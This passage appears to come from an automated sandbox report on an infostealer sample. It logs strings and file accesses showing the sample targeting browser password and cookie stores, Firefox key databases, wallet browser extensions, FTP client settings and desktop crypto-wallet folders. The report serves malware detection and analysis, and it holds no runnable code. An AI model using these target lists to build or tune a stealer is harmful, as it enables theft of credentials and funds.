Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
